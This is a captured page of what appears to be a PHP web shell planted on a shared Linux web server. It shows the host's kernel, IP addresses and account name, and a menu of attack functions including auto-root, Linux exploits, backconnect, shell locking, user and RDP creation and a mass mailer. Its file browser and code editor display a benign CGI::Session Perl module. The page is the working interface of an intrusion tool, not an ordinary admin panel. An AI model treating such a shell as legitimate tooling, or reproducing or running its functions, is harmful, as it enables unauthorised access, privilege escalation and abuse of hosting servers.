Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
CGI /
Session /
[ HOME SHELL ]
Name
Size
Permission
Action
Driver
[ DIR ]
drwxr-xr-x
ID
[ DIR ]
drwxr-xr-x
Serialize
[ DIR ]
drwxr-xr-x
Test
[ DIR ]
drwxr-xr-x
Driver.pm
7.32
KB
-rw-r--r--
ErrorHandler.pm
1.57
KB
-rw-r--r--
Tutorial.pm
25.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ErrorHandler.pm
package CGI::Session::ErrorHandler; # $Id$ use strict; $CGI::Session::ErrorHandler::VERSION = '4.43'; =pod =head1 NAME CGI::Session::ErrorHandler - error handling routines for CGI::Session =head1 SYNOPSIS require CGI::Session::ErrorHandler; @ISA = qw( CGI::Session::ErrorHandler ); sub some_method { my $self = shift; unless ( $some_condition ) { return $self->set_error("some_method(): \$some_condition isn't met"); } } =head1 DESCRIPTION CGI::Session::ErrorHandler provides set_error() and errstr() methods for setting and accessing error messages from within CGI::Session's components. This method should be used by driver developers for providing CGI::Session-standard error handling routines for their code =head2 METHODS =over 4 =item set_error($message) Implicitly defines $pkg_name::errstr and sets its value to $message. Return value is B<always> undef. =cut sub set_error { my $class = shift; my $message = shift; $class = ref($class) || $class; no strict 'refs'; ${ "$class\::errstr" } = $message || ""; return; } =item errstr() Returns whatever value was set by the most recent call to set_error(). If no message as has been set yet, the empty string is returned so the message can still concatenate without a warning. =back =cut *error = \&errstr; sub errstr { my $class = shift; $class = ref( $class ) || $class; no strict 'refs'; return ${ "$class\::errstr" } || ''; } =head1 LICENSING For support and licensing information see L<CGI::Session|CGI::Session>. =cut 1;
Close